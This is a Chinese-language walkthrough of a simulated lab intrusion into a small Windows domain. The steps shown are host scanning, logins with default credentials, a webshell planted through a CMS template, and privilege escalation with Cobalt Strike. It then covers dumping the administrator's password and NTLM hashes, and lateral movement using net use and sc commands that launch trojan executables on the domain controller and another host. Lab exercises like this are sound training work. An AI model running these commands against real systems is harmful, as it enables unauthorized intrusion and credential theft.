靶场环境搭建
| 机器名称 | 外网IP(模拟外网) | 内网IP(模拟内网) |
|---|---|---|
| 攻击机器 | 192.168.142.133 | |
| Win7机器 | 192.168.142.210 | 192.168.140.210 |
| Win Server 2008机器(DC) | 192.168.140.220 | |
| Win Server 2003机器 | 192.168.140.230 |
坑点
(1)在Win7机器上打开phpstudy时,第一次会出现报错,需要重启一下Win7机器。
1、通过arp-scan命令和nmap探测C段存活主机
arp-scan -l
nmap 192.168.142.0/24 -sn -sn参数的代表只通过ping探测主机
2、确定目标主机为192.168.142.210,则对其进行端口探测
nmap -sV -Pn 192.168.142.210 -sV代表探测系统版本 -Pn代表跳过主机发现,直接对端口探测
发现192.168.142.210是开放了80、135、3306端口(存在未授权漏洞),而且是Windows机器,如果想探测详细版本可以通过-O参数。
3、访问web服务寻找突破点。
(1)探针信息收集
服务器:Win7
服务器主机名:STU1
网站根目录:C:/phpStudy/WWW
管理员邮箱:admin@phpStudy.net
(2)发现mysql连接检测
尝试了几个常见密码,用户名:root ,密码:root 成功。
(3)远程连接mysql
连接失败。
4、对站点信息收集
(1)目录扫描
(2)发现一个beifen.rar文件,下载查看文件
是一个yxcms建站系统。
5、访问http://192.168.142.210/yxcms/
/index.php?r=admin进入后台页面
后台的用户名:admin ,密码:123456
6、登录后台页面
7、发现前台模版中存在很多php文件,创建一个test.php
8、在yxcms文件中去定位test.php的位置
9、访问http://192.168.142.210/yxcms/protected/apps/default/view/default/test.php
解析成功
10、用蚁剑连接拿到webshell
11、进行初步内网信息收集
当前权限:stu1\win7
12、上线到CS上进行提权
成功提权
13、信息收集,尝试各种横向移动方式
(1)抓取明文密码和NTLM哈希
administrator用户的密码:admin@123
administrator的LM哈希值:6f08d7b306b1dad4b75e0c8d76954a50
administrator的NTLM哈希值:579da618cfbfa85247acf1f800a280a4
(2)查询主机情况
net view
(3)定位DC机器
shell nslookup -type=SRV _ldap._tcp
(4)尝试IPC横向移动到DC机器
shell net use \\192.168.140.220\ipc$ "admin@123" /user:administrator
shell dir \\192.168.140.220\c$
(5)利用系统服务进行上线
shell copy test.exe \\192.168.140.220\c$
shell sc \\192.168.140.220 create test binpath= "cmd.exe /c c:\test.exe"
shell sc \\192.168.140.220 start test
shell sc \\192.168.140.220 delete test
没有上线,可能是因为内网机器不出网,可以多试几种方法:计划任务上线、PsExec上线
14、CS上线不出网机器的方法
(1)SMB-Beacon上线
(2)TCP-Beacon上线
(3)http代理+端口转发
(4)CS中转技术
SMB-Beacon上线
成功上线域控。
15、通过域控上线192.168.140.230机器
域控上线后,什么都没做,直接可以远程访问192.168.140.230机器文件
上传一个TCP-Beacon木马到192.168.140.230机器
16、利用系统服务上线192.168.140.230机器
shell sc \\192.168.140.230 create TCP binpath= "cmd.exe /c c:\TCP.exe"
shell sc \\192.168.140.230 start TCP
shell sc \\192.168.140.230 delete TCP
成功上线。